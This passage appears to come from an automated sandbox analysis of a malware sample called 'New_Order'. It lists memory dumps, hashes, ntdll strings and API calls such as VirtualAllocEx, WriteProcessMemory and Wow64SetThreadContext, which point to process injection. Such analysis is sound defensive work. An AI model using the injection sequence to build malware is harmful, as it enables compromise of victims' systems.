                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6861f8936ee30d28b67ba956ecd5aee6bd03f4311d3feb0f61196facd26c0f49
                                                                                                • Instruction ID: 6304e0580c75f2310cb6b040c671ec1716909ecc1b91cf7f214891e13400b15c
                                                                                                • Opcode Fuzzy Hash: 6861f8936ee30d28b67ba956ecd5aee6bd03f4311d3feb0f61196facd26c0f49
                                                                                                • Instruction Fuzzy Hash: 9790026535141442D10071588414B060015D7E1301F55C015E2064554DC619CD526227
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c1d1df83857218179dca35eb28180ec549c1a8e8b7539fb9f24fadf2d3cdad8
                                                                                                • Instruction ID: 0199a354a52d81d0ab292f28aa34ac04f7107adc225a2dfafe81b18af4789c82
                                                                                                • Opcode Fuzzy Hash: 6c1d1df83857218179dca35eb28180ec549c1a8e8b7539fb9f24fadf2d3cdad8
                                                                                                • Instruction Fuzzy Hash: 6C90047533141043D104715CC4047070055D7F1301F55C013F3154554CC53DCD715337
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0039d2dfe93c9490bb5aea98e37132447b449387cde6ea9464ab0f0e5b8ae7aa
                                                                                                • Instruction ID: 53b55d8da4c7f31901fc3d4e40f668c26f247b794c07b4f128567b691e365bac
                                                                                                • Opcode Fuzzy Hash: 0039d2dfe93c9490bb5aea98e37132447b449387cde6ea9464ab0f0e5b8ae7aa
                                                                                                • Instruction Fuzzy Hash: 8490023521181402D10071588808747001597D0302F55C011E6164555EC665C9916632
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6607bd7c48d8c4d50e299ae87d9dce0cfa5dc9b1b92762649a04ff7d6f6dbc0e
                                                                                                • Instruction ID: c5d6676cacaceb06e721afcbd1638d220a78cd6ae0819d56841c4d2ed1f42940
                                                                                                • Opcode Fuzzy Hash: 6607bd7c48d8c4d50e299ae87d9dce0cfa5dc9b1b92762649a04ff7d6f6dbc0e
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 3dc2ca945d5003286bfa4d8e38ec97348b616e3f75f2ccab202ff0c5514e2c44
                                                                                                • Instruction ID: ae0dc5d7be5901afed8cf5f188dee02356852b99505879ac69874a594ab3aca4
                                                                                                • Opcode Fuzzy Hash: 3dc2ca945d5003286bfa4d8e38ec97348b616e3f75f2ccab202ff0c5514e2c44
                                                                                                • Instruction Fuzzy Hash: 0D51D4B6A20117BFDB11DB9CC89097EFBB8BB08640B14832DE6A9D7641D774DE4087A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 1aa7f9488808ae17b625ae07afb2a6cac9bf9f20792e91bdbae61962eeb451ba
                                                                                                • Instruction ID: d2952a0c1455857edbd5ea65c0e13db333458da53926053698bae0991336863f
                                                                                                • Opcode Fuzzy Hash: 1aa7f9488808ae17b625ae07afb2a6cac9bf9f20792e91bdbae61962eeb451ba
                                                                                                • Instruction Fuzzy Hash: 84510571A0064AAEDB30DF9DC89097FFBF8EF84208B448459E5D6D7681E6B4EA40C764
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 012F4787
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012F4655
                                                                                                • Execute=1, xrefs: 012F4713
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012F46FC
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012F4742
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012F4725
                                                                                                • ExecuteOptions, xrefs: 012F46A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 137c41779ad80244d1e7b173fa45668a21834a933cd607211d02803258c04152
                                                                                                • Instruction ID: bc65b1d096fc516b7cb56f1a693305bfa5334675de2e406fe95952f455a22dde
                                                                                                • Opcode Fuzzy Hash: 137c41779ad80244d1e7b173fa45668a21834a933cd607211d02803258c04152
                                                                                                • Instruction Fuzzy Hash: C351393162021A6EEF25AAA8DCD5FFE77BCAF94744F0400ADD705A71D0E770AA418F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 2f04bced090ea4b70e4baed79c78d624bd3abcb406fca2b14da34db6e4b11ea1
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: EA81C230E6124A8EEF298E6CC8537BEBBB1AF55B90F28431DDB51A72D1C7348840CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: 9d0aa3ad33ffda33a16472313a6e47270f7500b5dfd1a8371eae0cb13e3e1338
                                                                                                • Instruction ID: 966a8bf3e5818c81303d2374d6aad115eaea3d00bc69b7666f6339c87b16c283
                                                                                                • Opcode Fuzzy Hash: 9d0aa3ad33ffda33a16472313a6e47270f7500b5dfd1a8371eae0cb13e3e1338
                                                                                                • Instruction Fuzzy Hash: 9021337AE10119ABDB21DE69DD44AFFBBF8AF94654F44011AEA05E3204E73099018BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F031E
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012F02BD
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012F02E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: 2c6fd58bfd0d60fa40e2c5778b55d2f80edeb79c5e128d49357338aeb5a6fd8b
                                                                                                • Instruction ID: bd6445d4c28cf4b5c54d5442540c3bdefd239a7637bbedee82fcf0d9ef0ad0d4
                                                                                                • Opcode Fuzzy Hash: 2c6fd58bfd0d60fa40e2c5778b55d2f80edeb79c5e128d49357338aeb5a6fd8b
                                                                                                • Instruction Fuzzy Hash: 43E1C030624742DFE725CF28C985B2ABBE1FB84714F540A2DF6A58B2D2D778D844CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F7BAC
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012F7B7F
                                                                                                • RTL: Resource at %p, xrefs: 012F7B8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: 597eb5c50c7fc2b858fbe4aaff621252e80c5ac6ee8099608d81bb905df023b1
                                                                                                • Instruction ID: 72f7efedef83d0f18c5b03d8a2359bbb254491257042046ab9fa548c3f13eceb
                                                                                                • Opcode Fuzzy Hash: 597eb5c50c7fc2b858fbe4aaff621252e80c5ac6ee8099608d81bb905df023b1
                                                                                                • Instruction Fuzzy Hash: 7141E2353247039FD725DE29C891BAAB7E5EF99710F000A2DFA5697280DB71E4058B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F728C
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F72C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012F7294
                                                                                                • RTL: Resource at %p, xrefs: 012F72A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: b0f3d683008e2b6d4ea57853f913b704763f4a9bc28ee8c5fde3da678f1d35d8
                                                                                                • Instruction ID: 633efc3d019fcff340a2cee46cdaada5fc607178b3402f366af2e79a55dee06a
                                                                                                • Opcode Fuzzy Hash: b0f3d683008e2b6d4ea57853f913b704763f4a9bc28ee8c5fde3da678f1d35d8
                                                                                                • Instruction Fuzzy Hash: 95410239760203AFD721DE29CC91FAAB7A5FB54714F10062DFA55AB280DB31F84687D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: e7ebc04868cf41fc4756402e7f95d4a484cceea4edc7e84cc64ae51c52f2a1c8
                                                                                                • Instruction ID: 1851b6ca7b94b7179f59be38a6d59ac857cd6617a91c0b8187a4b310ee7f514a
                                                                                                • Opcode Fuzzy Hash: e7ebc04868cf41fc4756402e7f95d4a484cceea4edc7e84cc64ae51c52f2a1c8
                                                                                                • Instruction Fuzzy Hash: 80316472A102199FDB20DE2DDC40BFFB7F8FB54614F84455AE949E3240EB30AA448BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 7ca3488527565b4157eea8d8351b018447bd10547de7cd0c9e9e590adeba3834
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: D7918071E2021B9BEB24DF6DC8816BEBBA5BF44B20F14871EEB55A72C0D77099408F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: 9fc680aaff5d717ee0ac307b33b2e7aaf62bff030f1f3368be56f4a2bc7ea548
                                                                                                • Instruction ID: c7add6e011d07f26ccb3a4d0d23041d9e0bfeea0f7a58173184dc76398c9c58d
                                                                                                • Opcode Fuzzy Hash: 9fc680aaff5d717ee0ac307b33b2e7aaf62bff030f1f3368be56f4a2bc7ea548
                                                                                                • Instruction Fuzzy Hash: 1E812B71D1126ADBDB35DB58CC45BEEB7B8AB48714F0041DAEA1AB7280D7705E84CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:9.5%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:123
                                                                                                Total number of Limit Nodes:9

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D136
                                                                                                • GetCurrentThread.KERNEL32 ref: 0231D173
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D1B0
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0231D209
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 7a5db8680c611b7813794ff34645ff4dc1ade0b54bcd4eb282e529bb19b0c21e
                                                                                                • Instruction ID: fe004f14cf629669cbb5380b8b473d911dd9c0b7d6f2e95076b0990ac64e99d7
                                                                                                • Opcode Fuzzy Hash: 7a5db8680c611b7813794ff34645ff4dc1ade0b54bcd4eb282e529bb19b0c21e
                                                                                                • Instruction Fuzzy Hash: 595176B0900349CFDB58DFAAD948B9EBFF1EF48314F248469E419A7360D734A845CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D136
                                                                                                • GetCurrentThread.KERNEL32 ref: 0231D173
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D1B0
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0231D209
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 3ac8094d2cb0892303c667e59d333110d2285c9908c690545b26c317458e0f3a
                                                                                                • Instruction ID: 76cefa9f9701635dfa82246840acfd3c0fd84e3940d7f0296d77ca070af4cb64
                                                                                                • Opcode Fuzzy Hash: 3ac8094d2cb0892303c667e59d333110d2285c9908c690545b26c317458e0f3a
                                                                                                • Instruction Fuzzy Hash: 9C5177B0900309CFDB58DFAAD948B9EBBF5EF48314F248469E419A7360D734A844CF65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 022B6B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 022B7016
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 022B7016
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0231B086
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 023159C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 023159C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022B6BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022B6BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 022B67DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0231D387
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 022B6CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 022B67DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 022B6CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0231D387
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 022B6B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231B101,00000800,00000000,00000000), ref: 0231B312
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231B101,00000800,00000000,00000000), ref: 0231B312
                                                                                                Memory Dump Source
